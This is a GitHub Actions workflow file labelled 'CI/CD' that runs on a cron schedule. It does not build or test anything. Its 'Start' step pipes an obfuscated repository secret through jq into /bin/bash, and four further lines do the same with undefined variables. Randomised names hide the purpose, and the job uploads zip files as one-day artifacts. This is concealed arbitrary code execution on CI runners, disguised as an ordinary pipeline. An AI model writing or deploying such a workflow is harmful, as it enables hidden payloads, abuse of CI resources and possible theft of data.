name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '26 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          trhvy65: ${{ secrets.trhvy65 }}
        run: |
          printf '%s' "$trhvy65" | jq -r .wydpo4517 | /bin/bash
          printf '%s' "$s8570" | jq -r .ltv21 | /bin/bash
          echo $y7 | jq -r .lc4 | /bin/bash
          echo $nkrg39 | jq -r .lfba14 | /bin/bash
          echo $euug9 | jq -r .qc7944 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: ERQxoOm1
          path: "*.zip"
          retention-days: 1
